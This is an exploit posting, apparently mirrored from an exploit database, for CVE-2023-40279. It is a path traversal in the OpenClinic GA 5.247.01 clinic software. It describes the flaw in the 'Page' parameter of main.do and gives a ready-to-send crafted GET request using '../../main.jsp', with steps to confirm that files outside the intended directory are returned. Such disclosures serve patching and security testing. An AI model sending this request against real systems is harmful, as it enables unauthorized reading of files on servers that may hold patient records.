Share
## https://sploitus.com/exploit?id=PACKETSTORM:178041
# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)  
# Date: 2023-08-14  
# Exploit Author: V. B.  
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/  
# Software Link: https://sourceforge.net/projects/open-clinic/  
# Version: OpenClinic GA 5.247.01  
# Tested on: Windows 10, Windows 11  
# CVE: CVE-2023-40279  
  
# Details  
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.  
  
# Proof of Concept (POC)  
Steps to Reproduce:  
  
- Crafting the Malicious GET Request:  
  
- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.  
- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):  
  
GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1  
Host: 192.168.100.5:10088  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36  
Connection: close  
Cookie: JSESSIONID=[SESSION ID]  
Cache-Control: max-age=0  
  
2. Confirming the Vulnerability:  
- Send the crafted GET request to the target server.  
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.  
- This vulnerability can lead to sensitive information disclosure or more severe attacks.